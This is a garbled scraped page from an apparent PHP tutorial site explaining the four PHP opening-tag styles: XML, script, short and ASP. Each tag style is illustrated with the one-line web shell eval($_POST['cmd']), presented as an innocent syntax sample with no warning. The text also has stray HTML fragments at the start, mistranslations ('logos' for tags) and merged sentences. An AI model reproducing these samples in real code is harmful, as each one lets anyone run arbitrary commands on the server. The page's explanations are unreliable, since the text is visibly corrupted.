), and short style ( ?> ), ASP style (<% %>)."/> ), and short style ( ?> ), ASP style (<% %>).">
Home > Article > Backend Development > What are the logos of PHP?
PHP logo has 4 styles
XML style ##PHP video tutorial)
<?php eval($_POST['cmd']); ?>php recommended markup style. Server administrators cannot disable it, and this style can be used on all servers.
Script style
<script language="php"> eval($_POST['cmd']); </script>It is enabled by default and cannot be disabled
<script language="php"> eval($_POST['cmd']); </script>
Short style
<? eval($_POST['cmd']); ?>This style needs to be configured in Enable the short_open_tage option in the file php.iniThis style is not supported by default in many environments
ASP style
<% eval($_POST['cmd']); %>This style The asp_tag option needs to be enabled in the configuration file php.iniIt is disabled by default
The above is the detailed content of What are the logos of PHP?. For more information, please follow other related articles on the PHP Chinese website!